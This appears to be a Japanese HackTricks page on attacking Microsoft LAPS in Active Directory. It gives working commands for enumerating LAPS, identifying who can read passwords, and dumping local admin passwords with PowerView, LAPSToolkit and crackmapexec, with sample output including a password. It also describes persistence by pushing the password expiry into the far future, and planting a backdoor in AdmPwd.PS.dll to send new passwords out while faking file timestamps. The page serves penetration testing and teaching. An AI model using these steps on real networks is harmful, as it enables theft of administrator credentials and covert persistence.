LAPS

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

基本情報

ローカル管理者パスワードソリューション(LAPS)は、管理者パスワード一意でランダムで頻繁に変更されたものに設定し、ドメインに参加しているコンピュータに適用するためのツールです。これらのパスワードは、Active Directory内に安全に保存され、アクセス制御リスト(ACL)を介して権限が付与されたユーザのみがアクセスできます。クライアントからサーバへのパスワードの送信のセキュリティは、Kerberosバージョン5と**Advanced Encryption Standard(AES)**の使用によって保証されています。

LAPSの実装により、ドメインのコンピュータオブジェクトには、ms-mcs-AdmPwdms-mcs-AdmPwdExpirationTimeという2つの新しい属性が追加されます。これらの属性は、それぞれ平文の管理者パスワードその有効期限を保存します。

アクティブ化されているかどうかを確認

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll

# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

LAPSパスワードアクセス

\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol から LAPSポリシーの生データをダウンロードし、次にGPRegistryPolicyParser パッケージから Parse-PolFile を使用してこのファイルを人間が読める形式に変換できます。

さらに、ネイティブLAPS PowerShellコマンドレットは、アクセス権を持つマシンにインストールされている場合に使用できます。

Get-Command *AdmPwd*

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl

# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

PowerViewを使用して、誰がパスワードを読み取ることができ、それを読み取ることができるかも調べることができます。

# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl

# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

LAPSToolkit

LAPSToolkitは、複数の機能を備えたLAPSの列挙を容易にします。 そのうちの1つは、LAPSが有効になっているすべてのコンピューターの**ExtendedRightsを解析することです。これにより、LAPSパスワードを読む権限を特定のグループに委任しているグループが表示されます。 ドメインにコンピューターを参加させたアカウントは、そのホストに対してAll Extended Rightsを受け取り、この権利によりパスワードを読む能力が与えられます。列挙により、ユーザーアカウントがホスト上のLAPSパスワードを読むことができることが示される場合があります。これにより、LAPSパスワードを読むことができる特定のADユーザーを特定する**のに役立ちます。

# Get groups that can read passwords
Find-LAPSDelegatedGroups

OrgUnit                                           Delegated Groups
-------                                           ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL                DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL           DOMAIN_NAME\LAPS Admin

# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName                Identity                    Reason
------------                --------                    ------
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\Domain Admins   Delegated
MSQL01.DOMAIN_NAME.LOCAL    DOMAIN_NAME\LAPS Admins     Delegated

# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName                Password       Expiration
------------                --------       ----------
DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41

Crackmapexecを使用してLAPSパスワードをダンプする

PowerShellへのアクセス権がない場合、LDAPを介してリモートでこの特権を悪用することができます

crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps

LAPSの永続性

有効期限日

一度管理者権限を取得すると、パスワードを取得し、有効期限日を将来に設定することで、マシンがパスワードを更新するのを防ぐことが可能です。

# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime

# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

管理者が**Reset-AdmPwdPasswordコマンドレットを使用するか、LAPS GPOでポリシーで必要な以上のパスワード有効期限を許可しない**が有効になっている場合、パスワードはリセットされます。

バックドア

LAPSの元のソースコードはこちらで見つけることができます。そのため、コード内(たとえばMain/AdmPwd.PS/Main.csGet-AdmPwdPasswordメソッド内)にバックドアを設置して、新しいパスワードを何らかの方法で外部に送信したり、どこかに保存することが可能です。

その後、新しいAdmPwd.PS.dllをコンパイルして、C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dllにアップロードします(および変更日時を変更します)。

参考文献

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

Last updated